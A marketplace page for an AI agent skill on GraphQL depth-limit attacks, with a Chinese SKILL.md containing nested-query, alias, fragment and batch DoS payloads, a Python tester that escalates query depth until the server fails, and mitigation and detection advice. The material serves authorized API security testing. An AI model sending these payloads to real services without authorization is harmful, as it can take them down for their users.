performing-graphql-depth-limit-attack

使用深度嵌套递归查询执行和测试 GraphQL 深度限制攻击,以识别 GraphQL API 中的拒绝服务(DoS)漏洞。

9 stars

Best use case

performing-graphql-depth-limit-attack is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

使用深度嵌套递归查询执行和测试 GraphQL 深度限制攻击,以识别 GraphQL API 中的拒绝服务(DoS)漏洞。

Teams using performing-graphql-depth-limit-attack should expect a more consistent output, faster repeated execution, less prompt rewriting.

When to use this skill

  • You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

  • You only need a quick one-off answer and do not need a reusable workflow.
  • You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/performing-graphql-depth-limit-attack/SKILL.md --create-dirs "https://raw.githubusercontent.com/killvxk/cybersecurity-skills-zh/main/skills/performing-graphql-depth-limit-attack/SKILL.md"

Manual Installation

  1. Download SKILL.md from GitHub
  2. Place it in .claude/skills/performing-graphql-depth-limit-attack/SKILL.md inside your project
  3. Restart your AI agent — it will auto-discover the skill

How performing-graphql-depth-limit-attack Compares

Feature / Agentperforming-graphql-depth-limit-attackStandard Approach
Platform SupportNot specifiedLimited / Varies
Context Awareness High Baseline
Installation ComplexityUnknownN/A

Frequently Asked Questions

What does this skill do?

使用深度嵌套递归查询执行和测试 GraphQL 深度限制攻击,以识别 GraphQL API 中的拒绝服务(DoS)漏洞。

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# 执行 GraphQL 深度限制攻击

## 概述

GraphQL 深度限制攻击利用 GraphQL Schema 的递归特性,构造深度嵌套的查询来消耗过多的服务器资源,从而导致拒绝服务(DoS)。与具有固定端点的 REST API 不同,GraphQL 允许客户端请求任意数据结构。当 Schema 包含循环关系时(例如 User -> Posts -> Author -> Posts),攻击者可以创建无限递归的查询,使服务器的 CPU、内存、数据库连接和网络带宽超负荷。

## 前置条件

- 已启用自省(Introspection)或已知 Schema 的目标 GraphQL API 端点
- GraphQL 客户端工具(GraphiQL、Altair、Insomnia 或 curl)
- Python 3.8+ 及 requests 库,用于自动化测试
- Burp Suite 或 mitmproxy,用于流量分析
- 对目标执行安全测试的授权

## 核心攻击技术

### 1. 递归深度攻击

当 GraphQL Schema 存在双向关系时,查询可以递归引用这些关系:

```graphql
# 具有循环引用的 Schema:
# type User { posts: [Post] }
# type Post { author: User }

# 使用过度嵌套深度的攻击查询
query DepthAttack {
  users {
    posts {
      author {
        posts {
          author {
            posts {
              author {
                posts {
                  author {
                    posts {
                      author {
                        posts {
                          title
                          author {
                            name
                          }
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}
```

### 2. 基于别名的放大攻击

当批量查询被阻断时,别名可以在单个查询中将相同的字段请求倍增:

```graphql
query AliasAmplification {
  a1: user(id: 1) { posts { author { name } } }
  a2: user(id: 1) { posts { author { name } } }
  a3: user(id: 1) { posts { author { name } } }
  a4: user(id: 1) { posts { author { name } } }
  a5: user(id: 1) { posts { author { name } } }
  a6: user(id: 1) { posts { author { name } } }
  a7: user(id: 1) { posts { author { name } } }
  a8: user(id: 1) { posts { author { name } } }
  a9: user(id: 1) { posts { author { name } } }
  a10: user(id: 1) { posts { author { name } } }
}
```

### 3. Fragment 展开攻击

Fragment 可以更高效地构建复杂的深度嵌套查询:

```graphql
fragment UserFields on User {
  name
  email
  posts {
    title
    comments {
      body
      author {
        ...NestedUser
      }
    }
  }
}

fragment NestedUser on User {
  name
  posts {
    title
    author {
      name
      posts {
        title
        author {
          name
        }
      }
    }
  }
}

query FragmentAttack {
  users {
    ...UserFields
  }
}
```

### 4. 字段重复攻击

在选择集中重复同一字段多次会增加处理负担:

```graphql
query FieldDuplication {
  user(id: 1) {
    posts { title }
    posts { title }
    posts { title }
    posts { title }
    posts { title }
    posts { title }
    posts { title }
    posts { title }
    posts { title }
    posts { title }
  }
}
```

### 5. 批量查询攻击

在单个 HTTP 请求中发送多个查询:

```json
[
  {"query": "{ users { posts { author { name } } } }"},
  {"query": "{ users { posts { author { name } } } }"},
  {"query": "{ users { posts { author { name } } } }"},
  {"query": "{ users { posts { author { name } } } }"},
  {"query": "{ users { posts { author { name } } } }"}
]
```

## 自动化测试脚本

```python
#!/usr/bin/env python3
"""GraphQL 深度限制攻击测试工具

通过发送递进式深度嵌套查询,测试 GraphQL 端点的深度限制漏洞。
"""

import requests
import time
import json
import sys
from typing import Optional

class GraphQLDepthTester:
    def __init__(self, endpoint: str, headers: Optional[dict] = None):
        self.endpoint = endpoint
        self.headers = headers or {"Content-Type": "application/json"}
        self.results = []

    def generate_nested_query(self, depth: int, field_a: str = "posts",
                               field_b: str = "author",
                               leaf_field: str = "name") -> str:
        """生成指定深度的递归嵌套 GraphQL 查询。"""
        query = "{ users { "
        for i in range(depth):
            if i % 2 == 0:
                query += f"{field_a} {{ "
            else:
                query += f"{field_b} {{ "
        query += leaf_field
        query += " }" * (depth + 1)  # 关闭所有括号
        query += " }"
        return query

    def generate_alias_query(self, count: int, inner_query: str) -> str:
        """生成包含多个别名的查询。"""
        aliases = []
        for i in range(count):
            aliases.append(f"a{i}: {inner_query}")
        return "{ " + " ".join(aliases) + " }"

    def send_query(self, query: str, timeout: int = 30) -> dict:
        """发送 GraphQL 查询并测量响应指标。"""
        payload = json.dumps({"query": query})
        start_time = time.time()
        try:
            response = requests.post(
                self.endpoint,
                data=payload,
                headers=self.headers,
                timeout=timeout
            )
            elapsed = time.time() - start_time
            return {
                "status_code": response.status_code,
                "response_time": round(elapsed, 3),
                "response_size": len(response.content),
                "has_errors": "errors" in response.json() if response.status_code == 200 else True,
                "error_message": self._extract_error(response),
                "success": response.status_code == 200 and "errors" not in response.json()
            }
        except requests.exceptions.Timeout:
            elapsed = time.time() - start_time
            return {
                "status_code": 0,
                "response_time": round(elapsed, 3),
                "response_size": 0,
                "has_errors": True,
                "error_message": "请求超时",
                "success": False
            }
        except requests.exceptions.ConnectionError:
            return {
                "status_code": 0,
                "response_time": 0,
                "response_size": 0,
                "has_errors": True,
                "error_message": "连接被拒绝——可能已发生 DoS",
                "success": False
            }

    def _extract_error(self, response) -> str:
        try:
            data = response.json()
            if "errors" in data:
                return data["errors"][0].get("message", "未知错误")
        except (json.JSONDecodeError, IndexError, KeyError):
            pass
        return ""

    def test_depth_limits(self, max_depth: int = 20):
        """递进测试递增的查询深度。"""
        print(f"测试从 1 到 {max_depth} 的深度限制...")
        print(f"{'深度':<8}{'状态码':<10}{'时间(s)':<12}{'大小(B)':<12}{'结果'}")
        print("-" * 65)

        for depth in range(1, max_depth + 1):
            query = self.generate_nested_query(depth)
            result = self.send_query(query)
            result["depth"] = depth
            self.results.append(result)

            status = "通过" if result["success"] else "已拦截"
            print(f"{depth:<8}{result['status_code']:<10}{result['response_time']:<12}"
                  f"{result['response_size']:<12}{status}")

            if result["error_message"] and "depth" in result["error_message"].lower():
                print(f"\n[+] 在深度 {depth} 处检测到深度限制")
                print(f"    错误:{result['error_message']}")
                return depth

            if result["status_code"] == 0:
                print(f"\n[!] 服务器在深度 {depth} 处变得无响应")
                return depth

        print(f"\n[!] 警告:在最大深度 {max_depth} 内未检测到深度限制")
        return None

    def test_alias_amplification(self, alias_counts: list = None):
        """测试基于别名的放大攻击。"""
        if alias_counts is None:
            alias_counts = [1, 5, 10, 25, 50, 100]

        print(f"\n测试别名放大攻击...")
        inner = 'user(id: "1") { posts { title } }'

        for count in alias_counts:
            query = self.generate_alias_query(count, inner)
            result = self.send_query(query)
            status = "通过" if result["success"] else "已拦截"
            print(f"  别名数:{count:<6} 状态码:{result['status_code']:<6} "
                  f"时间:{result['response_time']:<8}s  {status}")

    def generate_report(self) -> dict:
        """生成所有测试的摘要报告。"""
        successful = [r for r in self.results if r["success"]]
        blocked = [r for r in self.results if not r["success"]]
        max_successful_depth = max([r["depth"] for r in successful], default=0)

        return {
            "endpoint": self.endpoint,
            "total_tests": len(self.results),
            "successful_queries": len(successful),
            "blocked_queries": len(blocked),
            "max_successful_depth": max_successful_depth,
            "depth_limit_enforced": len(blocked) > 0,
            "vulnerability": "HIGH" if max_successful_depth > 10 else
                           "MEDIUM" if max_successful_depth > 5 else "LOW"
        }


if __name__ == "__main__":
    endpoint = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:4000/graphql"
    tester = GraphQLDepthTester(endpoint)
    tester.test_depth_limits(max_depth=15)
    tester.test_alias_amplification()

    report = tester.generate_report()
    print(f"\n{'='*50}")
    print(f"报告摘要")
    print(f"{'='*50}")
    for key, value in report.items():
        print(f"  {key}: {value}")
```

## 缓解策略

### 深度限制

```javascript
// 使用 graphql-depth-limit(Node.js)
const depthLimit = require('graphql-depth-limit');
const server = new ApolloServer({
  typeDefs,
  resolvers,
  validationRules: [depthLimit(5)]
});
```

### 查询复杂度分析

```javascript
// 使用 graphql-query-complexity
const { createComplexityRule } = require('graphql-query-complexity');

const complexityRule = createComplexityRule({
  maximumComplexity: 1000,
  estimators: [
    fieldExtensionsEstimator(),
    simpleEstimator({ defaultComplexity: 1 })
  ],
  onComplete: (complexity) => {
    console.log('查询复杂度:', complexity);
  }
});
```

### 速率限制和超时控制

```python
# 服务器端超时配置
GRAPHQL_CONFIG = {
    "max_depth": 5,
    "max_complexity": 1000,
    "max_aliases": 10,
    "query_timeout_seconds": 10,
    "max_batch_size": 5,
    "rate_limit_per_minute": 100
}
```

## 检测指标

- 服务器日志中异常深度或复杂的 GraphQL 查询
- 与特定查询模式相关的响应时间峰值
- GraphQL 服务器进程的内存或 CPU 使用率高
- 查询复杂度递增的重复请求
- 单个查询请求的响应负载过大

## 参考资料

- OWASP GraphQL Cheat Sheet
- Apollo GraphQL Security Guide
- PortSwigger GraphQL Vulnerabilities

Related Skills

recovering-from-ransomware-attack

9
from killvxk/cybersecurity-skills-zh

按照 NIST 和 CISA 框架执行结构化勒索软件事件恢复,包括环境隔离、取证证据保全、 干净基础设施重建、从已验证备份优先还原系统、凭据重置,以及针对再感染的验证。 涵盖 Active Directory 恢复、数据库还原和按依赖顺序重建应用栈。

performing-yara-rule-development-for-detection

9
from killvxk/cybersecurity-skills-zh

通过识别可执行文件中的唯一字节模式、字符串和行为指标,开发精准的 YARA 恶意软件检测规则,同时将误报率降至最低。

performing-wireless-security-assessment-with-kismet

9
from killvxk/cybersecurity-skills-zh

使用 Kismet 通过被动射频监控进行无线网络安全评估,检测流氓接入点(Rogue AP)、隐藏 SSID、弱加密和未授权客户端。

performing-wireless-network-penetration-test

9
from killvxk/cybersecurity-skills-zh

执行无线网络渗透测试,通过捕获握手包、破解 WPA2/WPA3 密钥、检测流氓接入点以及使用 Aircrack-ng 和相关工具测试无线网络分段,评估 WiFi 安全性。

performing-windows-artifact-analysis-with-eric-zimmerman-tools

9
from killvxk/cybersecurity-skills-zh

使用 Eric Zimmerman 的开源 EZ Tools 套件(包括 KAPE、MFTECmd、PECmd、LECmd、JLECmd 和 Timeline Explorer)执行全面的 Windows 取证制品分析,解析注册表 hive、预取文件、事件日志和文件系统元数据。

performing-wifi-password-cracking-with-aircrack

9
from killvxk/cybersecurity-skills-zh

在授权无线安全评估中捕获 WPA/WPA2 握手包,并使用 aircrack-ng、hashcat 和字典攻击进行离线密码破解, 以评估密码短语强度和无线网络安全状况。

performing-web-cache-poisoning-attack

9
from killvxk/cybersecurity-skills-zh

在授权安全测试期间,通过未纳入缓存键的头部和参数毒化缓存响应,利用 Web 缓存机制向其他用户投递恶意内容。

performing-web-cache-deception-attack

9
from killvxk/cybersecurity-skills-zh

通过利用 CDN 缓存层与源服务器之间的路径规范化差异,执行 Web 缓存欺骗攻击,从而缓存并获取敏感的已认证内容。

performing-web-application-vulnerability-triage

9
from killvxk/cybersecurity-skills-zh

使用 OWASP 风险评级方法论对 DAST/SAST 扫描器的 Web 应用程序漏洞发现进行分类,区分真阳性和假阳性,并确定修复优先级。

performing-web-application-scanning-with-nikto

9
from killvxk/cybersecurity-skills-zh

Nikto 是一款开源 Web 服务器和 Web 应用程序扫描器,可针对超过 7,000 个潜在危险文件/程序进行测试,检查超过 1,250 个服务器的过期版本,并识别超过 270 个服务器的版本特定问题。

performing-web-application-penetration-test

9
from killvxk/cybersecurity-skills-zh

遵循 OWASP Web 安全测试指南(WSTG)方法论,对 Web 应用程序执行系统化安全测试,识别认证、授权、 输入验证、会话管理和业务逻辑中的漏洞。测试人员以 Burp Suite 作为主要拦截代理,结合手动测试技术 发现自动化扫描器遗漏的缺陷。适用于 Web 应用渗透测试、OWASP 测试、应用安全评估或 Web 漏洞测试等请求场景。

performing-web-application-firewall-bypass

9
from killvxk/cybersecurity-skills-zh

使用编码技术、HTTP 方法操控、参数污染和载荷混淆绕过 Web 应用防火墙保护,将 SQL 注入、XSS 及其他攻击载荷穿透 WAF 检测规则。